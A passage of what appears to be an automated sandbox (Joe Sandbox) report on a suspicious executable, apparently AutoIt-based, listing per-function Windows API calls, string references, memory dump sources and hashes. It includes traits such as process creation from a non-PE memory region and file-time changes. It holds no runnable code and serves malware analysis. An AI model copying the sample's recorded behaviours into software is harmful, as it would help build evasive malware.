Part of subcall function 00AC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC9A24), ref: 00AC2D69
Part of subcall function 00AC2D55: GetLastError.KERNEL32(00000000,?,00AC9A24), ref: 00AC2D7B

_free.LIBCMT ref: 00B0971C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
Instruction ID: 57a3e7bfdf476db63eac01b6ab124083f44a9c2f0adc5fe18b2469b9493e8d32
Opcode Fuzzy Hash: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
Instruction Fuzzy Hash: 3B5141B1D14258AFDF259FA4CC81A9EBBB9EF88300F10449EF509A3291DB715E80CF58

Function 00AC470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AC47A0
__flush.LIBCMT ref: 00AC47C0
__write.LIBCMT ref: 00AC47F3
__flsbuf.LIBCMT ref: 00AC4821

Part of subcall function 00AC8B28: __getptd_noexit.LIBCMT ref: 00AC8B28

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: d1b23a661ae4c479609aebee153ef0739f2eeef589ef82ae2e96b966329dfabd
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: A441B375A007459BDF188FA9C9A0FAE7BB5AF49360B26813DE81587680DB74DD408B48

Function 00AA44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AA44CF

Part of subcall function 00AA407C: _memset.LIBCMT ref: 00AA40FC
Part of subcall function 00AA407C: _wcscpy.LIBCMT ref: 00AA4150
Part of subcall function 00AA407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AA4160

KillTimer.USER32(?,00000001,?,?), ref: 00AA4524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA4533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ADD4B9

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 59d985c22bbd67354ad988a1c74d81c09538621c64fe84f89c5f614332a107f8
Instruction ID: 86b2c237db0106b43afd6197a475fd34c42739b783f87d61f924d3afc507d4f3
Opcode Fuzzy Hash: 59d985c22bbd67354ad988a1c74d81c09538621c64fe84f89c5f614332a107f8
Instruction Fuzzy Hash: 2F21C5B4904784AFE7328B24C855BE6BBFC9B46318F04009EF69A5B281C7B46E85CB51

Function 00AA7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ADEA39
GetOpenFileNameW.COMDLG32(?), ref: 00ADEA83

Part of subcall function 00AA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA4743,?,?,00AA37AE,?), ref: 00AA4770

Part of subcall function 00AC0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AC07B0

Strings

X, xrefs: 00ADEA51

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 2e1d5222d9926d982b6568885642d4089179d3290695a1021e2e1133a55c4428
Instruction ID: 695eda9da883be2b6e73ea517d69c5116dacd04f9c22d053c7f4fe20707f661c
Opcode Fuzzy Hash: 2e1d5222d9926d982b6568885642d4089179d3290695a1021e2e1133a55c4428
Instruction Fuzzy Hash: AF21C071A002489BCB51DF94CC45BEE7BFCAF49711F00405AE809BB281DFB4598D8FA1

Function 00B08D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B08DAC
__fread_nolock.LIBCMT ref: 00B08DC1

Strings

EA06, xrefs: 00B08DF3

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 478ede8a5f758613b6fb580d1ba1875eed1ae6dadfd80987c62b857ed683b046
Instruction ID: 4d28d6e3f4faf6400d0bedbc5ef451282daffb7d855eb248d3a89791f6da8d16
Opcode Fuzzy Hash: 478ede8a5f758613b6fb580d1ba1875eed1ae6dadfd80987c62b857ed683b046
Instruction Fuzzy Hash: 1801B971D042187EDB18CAA9C856FEE7BF8DB15311F00469EF592D21C1E979E6088760

Function 014E6450 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 014E6495
ExitProcess.KERNEL32(00000000), ref: 014E64B4

Strings

D, xrefs: 014E6461

Memory Dump Source

Source File: 00000000.00000002.1354881625.00000000014E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 014E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e5000_MBOaS3GRtF.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 4638e4dcbcb64820f1c19d6545d26c0fb6ea82a3cd30bab000e26f1f9ebc6855
Instruction ID: d44fae059f621b2b403b7c909a58d78139f2e39d533e75d30e9d539b8a1495ff
Opcode Fuzzy Hash: 4638e4dcbcb64820f1c19d6545d26c0fb6ea82a3cd30bab000e26f1f9ebc6855
Instruction Fuzzy Hash: F7F0E17254024DABDB60DFE0CC49FEE77BCBF14702F008519FA1A9A144DA78960887A1

Function 00B098E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00B098F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B0990F

Strings

aut, xrefs: 00B09909

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 80459b2c5a5d2234096c68a0cf11b18181aee29432bd0467df4db3aad43e4503
Instruction ID: c56af2b831a7c8c70f63e6ede09233d9f81d0d1d19080a2b6829d2287661c04a
Opcode Fuzzy Hash: 80459b2c5a5d2234096c68a0cf11b18181aee29432bd0467df4db3aad43e4503
Instruction Fuzzy Hash: F6D05E7994030EABDB609BA0DC0EFAA777CE704701F0002F1BE54D21A1EEB195998BA1

Function 00B1CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24727f5471447ea3f17f931dfd3f05d8033e1f163616463d17c69254b9806acb
Instruction ID: fc091d1f0c35a34b21279bf6c0ba32da318d9215e97aef1bfacdffe65523645a
Opcode Fuzzy Hash: 24727f5471447ea3f17f931dfd3f05d8033e1f163616463d17c69254b9806acb
Instruction Fuzzy Hash: 0BF149716083019FCB14DF28C580A6ABBE5FF89314F54896EF8999B391D734E945CF82

Function 00AAF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AC0193
Part of subcall function 00AC0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AC019B
Part of subcall function 00AC0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AC01A6
Part of subcall function 00AC0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AC01B1
Part of subcall function 00AC0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AC01B9
Part of subcall function 00AC0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AC01C1

Part of subcall function 00AB60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00AAF930), ref: 00AB6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AAF9CD
OleInitialize.OLE32(00000000), ref: 00AAFA4A
CloseHandle.KERNEL32(00000000), ref: 00AE45C8

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 9e71466b44801693f77120cf44d26618e3e5ebfdc837334e95e9932de3db939f
Instruction ID: 8a018c6d127681d045d708dcbce56cc18dbf89fc1270547348a623f3cdb49953
Opcode Fuzzy Hash: 9e71466b44801693f77120cf44d26618e3e5ebfdc837334e95e9932de3db939f
Instruction Fuzzy Hash: 5B81CEB1901A408EC3B4DF39AD446697BE9FB58306F5081AAD059CB3E9EFF844A48F14

Function 00AA434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AA4370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA4415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA4432

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: b91c3d0431e5d6a7334b92cd3a645fb587e456f8f034d8a6b1a25bbe6e0d0615
Instruction ID: 90e90aaf1055ab86b01b7a2e4bb7866f7774026fc676ae0374417b913822c265
Opcode Fuzzy Hash: b91c3d0431e5d6a7334b92cd3a645fb587e456f8f034d8a6b1a25bbe6e0d0615
Instruction Fuzzy Hash: 843150B05047019FD761DF24D88469BBBF8FB9D309F00092EF59A87291DBB5A944CB52

Function 00AC571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00AC5733

Part of subcall function 00ACA16B: __NMSG_WRITE.LIBCMT ref: 00ACA192
Part of subcall function 00ACA16B: __NMSG_WRITE.LIBCMT ref: 00ACA19C

__NMSG_WRITE.LIBCMT ref: 00AC573A

Part of subcall function 00ACA1C8: GetModuleFileNameW.KERNEL32(00000000,00B633BA,00000104,?,00000001,00000000), ref: 00ACA25A
Part of subcall function 00ACA1C8: ___crtMessageBoxW.LIBCMT ref: 00ACA308

Part of subcall function 00AC309F: ___crtCorExitProcess.LIBCMT ref: 00AC30A5
Part of subcall function 00AC309F: ExitProcess.KERNEL32 ref: 00AC30AE

Part of subcall function 00AC8B28: __getptd_noexit.LIBCMT ref: 00AC8B28

RtlAllocateHeap.NTDLL(014A0000,00000000,00000001,00000000,?,?,?,00AC0DD3,?), ref: 00AC575F

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 30599d8d4db16a5971c678ac18cc04e67e62cfe60477ad0b14b3299a384ac6a0
Instruction ID: 59453bc07a0a920d3e6db2937a829aea6a6a05112fa41f19a8672a2ad2b30105
Opcode Fuzzy Hash: 30599d8d4db16a5971c678ac18cc04e67e62cfe60477ad0b14b3299a384ac6a0
Instruction Fuzzy Hash: 6A01F536A00B11DEDA102B74ED42F2E7398DB52761F53092DF505AB1C1DFB4ACC04660

Function 00B098A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00B09548,?,?,?,?,?,00000004), ref: 00B098BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B09548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00B098D1
CloseHandle.KERNEL32(00000000,?,00B09548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B098D8

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: aea1732de9cc8bb516ead71be1714934c794754761dc35969fd50037aade6de4
Instruction ID: 82658998302e97ba59691cf912b438a0246994dd2f007c30dbac1b7b691f5ace
Opcode Fuzzy Hash: aea1732de9cc8bb516ead71be1714934c794754761dc35969fd50037aade6de4
Instruction Fuzzy Hash: 66E08632141315B7D7311B54EC0AFDA7F69EB06B61F108230FB147A0E08BB119229798

Function 00B08D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B08D1B

Part of subcall function 00AC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC9A24), ref: 00AC2D69
Part of subcall function 00AC2D55: GetLastError.KERNEL32(00000000,?,00AC9A24), ref: 00AC2D7B

_free.LIBCMT ref: 00B08D2C
_free.LIBCMT ref: 00B08D3E

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 6f90bc654fdfbaeb095126fef57af860952fbd373f143999227befaceb9eba13
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 85E012E161160157CF25A5B8AA40F9327DC9F683527150B7DB44ED71C6CE64F9428228

Function 00AAA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00ADFC01

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 726d403ee828ac129d512084801083f0344c0eff0740ede433abc29a321e6d11
Instruction ID: ec7e3740d1d1f65f60de92a19a4e0edf151f956f4f329f2bb3fbb6c6fa05c1a0
Opcode Fuzzy Hash: 726d403ee828ac129d512084801083f0344c0eff0740ede433abc29a321e6d11
Instruction Fuzzy Hash: E0225870608341DFD724DF14C590A6ABBF1BF9A304F15896DE89A8B3A2D735EC45CB82

Function 00AA4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA4CBA

Strings

EA06, xrefs: 00ADD8CC

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 4da6f310e3e2e334d83052914b8a988e1188b34c8ffd700eff33b74769bc847f
Instruction ID: 4f9a679111df2805f82a0e3b34d55b4fc6499efe9fde0044ce9b4351767b985e
Opcode Fuzzy Hash: 4da6f310e3e2e334d83052914b8a988e1188b34c8ffd700eff33b74769bc847f
Instruction Fuzzy Hash: 80415D31A041586BDF229F64C9527BEBFB29BCF300F284475FC869B2C6D7A09D4483A1

Function 00B077B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B078DB

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: df86a6d2d486dd481d4043f9ba43822153a21596cc642c3fdd6acf18afaf71e2
Instruction ID: 51e282547159e6480ac7e03585fce4915acd5a97671eec5f849db32ed19151ce
Opcode Fuzzy Hash: df86a6d2d486dd481d4043f9ba43822153a21596cc642c3fdd6acf18afaf71e2
Instruction Fuzzy Hash: 1F41A471D483059FDB10EFA9D989EAAFBE8EF09340B248499E185972C1DF75AC01D760

Function 00AA7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA7AAB
_memmove.LIBCMT ref: 00AA7B16

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 5de438b4bbeb6ea6bf5d4d191a06a7a70a83262c81ab0dc82e7a250ab2e3169d
Instruction ID: 9a1e0c9a58d5c6bd66505750b92172125467154c53ebd6802917a497f467e4f5
Opcode Fuzzy Hash: 5de438b4bbeb6ea6bf5d4d191a06a7a70a83262c81ab0dc82e7a250ab2e3169d
Instruction Fuzzy Hash: E93173B1604606AFC704DF68CDD1E6EB3A9FF49350715862DE51ACB2D1EB30E950CB90

Function 00AA47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00AA4834

Part of subcall function 00AC336C: __lock.LIBCMT ref: 00AC3372
Part of subcall function 00AC336C: DecodePointer.KERNEL32(00000001,?,00AA4849,00AF7C74), ref: 00AC337E
Part of subcall function 00AC336C: EncodePointer.KERNEL32(?,?,00AA4849,00AF7C74), ref: 00AC3389

Part of subcall function 00AA48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AA4915
Part of subcall function 00AA48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AA492A

Part of subcall function 00AA3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AA3B68
Part of subcall function 00AA3B3A: IsDebuggerPresent.KERNEL32 ref: 00AA3B7A
Part of subcall function 00AA3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B652F8,00B652E0,?,?), ref: 00AA3BEB
Part of subcall function 00AA3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00AA3C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AA4874

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

